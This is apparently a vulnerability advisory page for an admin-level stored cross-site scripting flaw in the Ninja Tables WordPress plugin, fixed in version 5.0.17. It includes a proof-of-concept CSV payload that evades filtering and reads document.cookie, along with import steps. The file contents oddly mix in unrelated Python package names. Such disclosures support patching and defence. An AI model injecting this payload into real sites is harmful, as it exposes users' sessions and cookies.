Ninja Tables < 5.0.17 – Admin+ Stored XSS | CVE 2024-12772 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape a parameter before outputting it back in the page when importing a CSV, leading to a Cross Site Scripting vulnerability.

Proof of Concept

1. Create a file containing:

tqdm

</scrip</script>t><img src =q onerror=alert(document.cookie)>

IPython

tqdm

scikit-learn

matplotlib

r2pipe

matplotlib

angr

psutil

termcolor

celery

flower

2. In the plugin settings, add a new table and select the import from CSV option.

3. Import the file created above and when the table is loaded, see the XSS.

Affects Plugins

Fixed in 5.0.17

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

tnt24

Submitter

tnt24

Verified

Yes

WPVDB ID

7b6d0f95-6632-4079-8c1b-517a8d02c330

Timeline

Publicly Published

2025-01-09 (about 11 months ago)

Added

2025-01-09 (about 11 months ago)

Last Updated

2025-01-09 (about 11 months ago)

Other

Published

Title

Published

2023-01-27

Title

TinyMCE Custom Styles < 1.1.3 - Admin+ Stored XSS

Published

2021-09-20

Title

Page Generator < 1.5.9 - Reflected Cross-Site Scripting

Published

2022-05-16

Title

Video Slider - Slider Carousel < 1.4.8 - Admin+ Stored Cross-Site Scripting

Published

2024-02-19

Title

Password Protected < 2.6.7 - Admin+ Stored XSS

Published

2024-03-25

Title

Unlimited Elements For Elementor < 1.5.94 - Reflected Cross-Site Scripting